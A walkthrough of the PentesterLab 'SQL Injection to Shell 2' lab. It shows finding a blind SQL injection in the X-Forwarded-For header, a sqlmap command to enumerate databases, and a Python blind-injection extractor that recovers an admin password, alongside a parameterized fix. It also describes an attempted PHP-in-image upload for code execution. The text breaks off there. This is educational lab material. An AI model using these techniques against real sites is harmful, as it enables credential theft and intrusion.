From SQL Injection to Shell 2: Walkthrough

I found this challenge really interesting and demanding, and quite close to the practical web app security work we see every day.

Without much ado, let's jump in. This write-up covers the second challenge, SQL Injection to Shell II, where the goal is to gain access to the administration console.

You can download the VM ISO: PentesterLab's "From SQL Injection to Shell 2".

This exercise is all about exploiting a blind SQL injection and then finding a vulnerability in the framework the application runs on.

If you are not familiar with blind SQL injection, start with an introduction to blind SQL injection. In short, blind SQL injection can be a real pain: unlike error-based injection, nothing from the query is echoed back to you, so every bit of information has to be inferred from the application's behaviour, and that demands a much higher degree of patience.

So, patience in hand, I moved forward and tried to exploit every possible parameter the application presented to me.

Step: Recon the application

This is the first step before any attack: know your application, how it behaves and what information it discloses during testing.

1. Application is written in PHP
2. Web server (not a framework): nginx, version 0.7.67

The application looks like the screenshot below.


Attack: find the point of injection. The point of injection is the key to exploiting a SQL injection, so I tried everything to find it. Honestly speaking: FAILED!!! [By this time I had not visited the course content on the site for clues; I wanted to do it blind, as a regular black-box test, the way I usually do.]

Then I thought about the possible structure of the website, and for this I looked for files in the application.

Along that line I saw that all the pictures uploaded to the website have the path /admin/uploads/picture.extension

So this means only the admin has image-uploading capability; if there is a "users" table, it probably holds the username and password for the admin only.

So I started fiddling with the request headers:
1. Cookies
2. User-Agent
3. Referer
4. an added header: X-Forwarded-For
 
I failed with the first three, but with the fourth it clicked; see the screenshot below.
Now I was sure about X-Forwarded-For: this header is used by the application to capture the client's IP when requests pass through a proxy, so whatever value the client sends is trusted and, here, ends up inside a database query.
 
Let's exploit it using a popular tool: sqlmap

python sqlmap.py -u "http://192.168.0.102" --headers="X-Forwarded-For: *" --dbs [I used this line to enumerate the database names; the * marks the injection point inside the custom header]

This gave me the database name: Photoblog
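To make the blind part concrete, here is an added Python example (mine, not the lab's code and not how sqlmap is implemented): a hypothetical visit logger that concatenates the X-Forwarded-For value into an INSERT the way the page describes, beside the parameterized fix, and a boolean-blind extractor that reads the admin password one character at a time using nothing but the 200-versus-500 status difference. The table names follow the dump on this page; the rows, the SQLite backend, the status codes and the integer-overflow trick used to force a failure are my assumptions.

```python
import sqlite3

# Constructed stand-in for the lab's photoblog database. The table names follow
# the dump on this page (users, stats); the rows are invented for the demo.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT);
CREATE TABLE stats (id INTEGER PRIMARY KEY, ip TEXT, page TEXT);
INSERT INTO users (login, password) VALUES ('admin', 'p4ssw0rd');
"""


class PhotoblogApp:
    """Hypothetical visit logger: records the client IP taken from X-Forwarded-For."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript(SCHEMA)

    def handle_vulnerable(self, headers, page="/"):
        """The header value is concatenated straight into the INSERT (the bug)."""
        ip = headers.get("X-Forwarded-For", "127.0.0.1")
        sql = "INSERT INTO stats (ip, page) VALUES ('%s', '%s')" % (ip, page)
        try:
            self.db.execute(sql)
            self.db.commit()
            return 200
        except sqlite3.Error:
            # Assumed: a failed query surfaces as a 500. Nothing from the query
            # is ever shown to the client, so the status code is the only signal.
            return 500

    def handle_fixed(self, headers, page="/"):
        """Same logic with bound parameters: the header can no longer alter the query."""
        ip = headers.get("X-Forwarded-For", "127.0.0.1")
        self.db.execute("INSERT INTO stats (ip, page) VALUES (?, ?)", (ip, page))
        self.db.commit()
        return 200


# --- attacker side ---------------------------------------------------------

def ask(handler, condition):
    """Boolean-blind oracle: True if the SQL `condition` holds.

    The payload closes the ip string, splices in an expression that is harmless
    when the condition is true and raises an error when it is false, then
    reopens the string so the rest of the original query stays valid:
      VALUES ('1.2.3.4' || abs(CASE WHEN (cond) THEN 1 ELSE -9223372036854775808 END) || '', '/')
    abs() of the smallest 64-bit integer is a documented SQLite "integer
    overflow" error, so no knowledge of the schema is needed to force a failure.
    """
    payload = ("1.2.3.4' || abs(CASE WHEN (%s) THEN 1 "
               "ELSE -9223372036854775808 END) || '" % condition)
    return handler({"X-Forwarded-For": payload}) == 200


def injectable(handler):
    """Confirm the injection point: a true and a false condition must differ."""
    return ask(handler, "1=1") and not ask(handler, "1=2")


CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract(handler, query, max_len=32):
    """Pull the single value returned by `query`, one character per confirmed guess."""
    if not injectable(handler):
        return None
    out = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if ask(handler, "substr((%s), %d, 1) = '%s'" % (query, pos, ch)):
                out += ch
                break
        else:
            break  # no character matched: end of the value (or outside CHARSET)
    return out


if __name__ == "__main__":
    app = PhotoblogApp()
    secret = "SELECT password FROM users WHERE login = 'admin'"
    print("vulnerable handler injectable:", injectable(app.handle_vulnerable))
    print("admin password:", extract(app.handle_vulnerable, secret))
    print("fixed handler injectable:", injectable(app.handle_fixed))
```

The `injectable` check is the step that matters most in practice: a boolean oracle that answers "true" to everything (which is exactly what the parameterized handler produces) would otherwise be read as a string of matches. sqlmap performs the same true/false comparison before it trusts a header as an injection point.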

Now it's time to dump the tables of the database above.

The output is given below. So we got four tables:
categories
pictures
stats
users
 
Now let's dump the users table and its contents.
Now that we have the admin's login and password, let's use the credentials to log into the account. We can see there is an "add a new picture" function, so it's time to look for RCE.
I tried all the possible bypasses I know of but failed there, so I thought of uploading a file with malicious PHP code inside the image, and did exactly that. The image I uploaded, when accessed, displayed just the image: no code execution. [screenshot below] I thought: what now???